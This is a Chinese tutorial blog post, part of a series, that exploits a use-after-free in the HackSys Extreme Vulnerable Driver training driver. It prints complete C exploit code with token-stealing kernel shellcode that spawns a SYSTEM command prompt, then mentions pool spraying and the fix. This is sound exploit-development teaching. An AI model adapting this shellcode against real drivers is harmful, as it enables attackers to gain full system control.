初探UAF漏洞(3)

发布时间:2024年01月12日

?构造exp

#include <iostream>
#include <Windows.h>

typedef void(*FunctionPointer) ();

typedef struct _FAKE_USE_AFTER_FREE
{
    FunctionPointer countinter;
    char bufffer[0x54];
}FAKE_USE_AFTER_FREE, * PUSE_AFTER_FREE;

void ShellCode()
{
    _asm
    {
        nop
        pushad
        mov eax, fs: [124h]  
        mov eax, [eax + 0x50]   
        mov ecx, eax
        mov edx, 4              

        find_sys_pid :
        mov eax, [eax + 0xb8]   
        sub eax, 0xb8           
        cmp[eax + 0xb4], edx    
        jnz find_sys_pid

        mov edx, [eax + 0xf8]
        mov[ecx + 0xf8], edx
        popad
        ret
    }
}

static VOID CreateCmd()
{
    STARTUPINFO si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_SHOW;
    WCHAR wzFilePath[MAX_PATH] = { L"cmd.exe" };
    BOOL bReturn = CreateProcessW(NULL, wzFilePath, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&si, &pi);
    if (bReturn) CloseHandle(pi.hThread), CloseHandle(pi.hProcess);
}


int main()
{
    DWORD recvBuf;
    // 获取句柄
    HANDLE hDevice = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_READ | GENERIC_WRITE,
        NULL,
        NULL,
        OPEN_EXISTING,
        NULL,
        NULL);

    if (hDevice == INVALID_HANDLE_VALUE || hDevice == NULL)
    {
        printf("获取句柄失败\n");
        return 0;
    }

    DeviceIoControl(hDevice, 2236435, NULL, NULL, NULL, 0, &recvBuf, NULL);
    DeviceIoControl(hDevice, 2236443, NULL, NULL, NULL, 0, &recvBuf, NULL);
    PUSE_AFTER_FREE fakeG_UseAfterFree = (PUSE_AFTER_FREE)malloc(sizeof(FAKE_USE_AFTER_FREE));
    fakeG_UseAfterFree->countinter = ShellCode;
    RtlFillMemory(fakeG_UseAfterFree->bufffer, sizeof(fakeG_UseAfterFree->bufffer), 'A');


    DeviceIoControl(hDevice, 2236511, fakeG_UseAfterFree, 0x60, NULL, 0, &recvBuf, NULL);
    DeviceIoControl(hDevice, 2236439, NULL, NULL, NULL, 0, &recvBuf, NULL);

    CreateCmd();
    return 0;
}

为了能够保证v1g_UseAfterFreeObjectNonPagedPool指向同一块内存,可以使用池喷射的方式。

修复

g_UseAfterFreeObjectNonPagedPool在释放后指向null即可避免问题

文章来源:https://blog.csdn.net/2301_80520893/article/details/135498222
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。